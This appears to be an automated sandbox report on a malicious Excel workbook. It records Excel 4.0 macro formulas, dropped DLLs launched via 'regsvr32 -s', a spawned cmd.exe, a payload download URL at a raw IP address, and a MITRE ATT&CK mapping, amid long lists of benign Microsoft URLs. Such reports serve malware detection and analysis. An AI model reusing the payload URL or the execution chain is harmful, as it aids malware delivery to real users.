    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: https://sectigo.com/CPS0
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://settings.outlook.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://staging.cortana.ai
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://tasks.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://wus2.contentsync.
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Total_order_data-V2434883.xlsbInitial sample: CALL
    Source: Total_order_data-V2434883.xlsbInitial sample: CALL
    Source: Total_order_data-V2434883.xlsbInitial sample: EXEC
    Office process drops PE fileShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal80.expl.evad.winXLSB@5/10@0/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{40B4E29A-81E2-4785-950C-FD213AB7F011} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image4.png
    Source: Total_order_data-V2434883.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E02AF0 push dword ptr [edx+14h]; ret 2_2_00E02BFD
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_01170456 mov eax, dword ptr fs:[00000030h]2_2_01170456
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0117095E mov eax, dword ptr fs:[00000030h]2_2_0117095E
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1DLL Side-Loading1Process Injection11Masquerading111OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution42Boot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Total_order_data-V2434883.xlsb2%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    2.2.regsvr32.exe.970000.2.unpack100%AviraTR/Dropper.GenDownload File
    2.2.regsvr32.exe.8340f0.1.unpack100%AviraTR/Patched.Ren.GenDownload File
    2.2.regsvr32.exe.9c0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    http://185.180.199.121/sat1_0609_2.dll0%VirustotalBrowse
    http://185.180.199.121/sat1_0609_2.dll0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    http://ocsp.sectigo.com00%URL Reputationsafe
    http://ocsp.sectigo.com00%URL Reputationsafe
    http://ocsp.sectigo.com00%URL Reputationsafe
    http://ocsp.sectigo.com00%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://185.180.199.121/sat1_0609_2.dllfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
      high
      https://login.microsoftonline.com/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
        high
        https://shell.suite.office.com:1443E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
            high
            https://autodiscover-s.outlook.com/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                high
                https://cdn.entity.E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/queryE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkeyE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                      high
                      https://powerlift.acompli.netE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                        high
                        https://cortana.aiE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspxE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                  high
                                  https://api.aadrm.com/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                        high
                                        https://cr.office.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControlE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/OfficeE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                              high
                                              https://graph.ppe.windows.netE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptioneventsE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.netE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
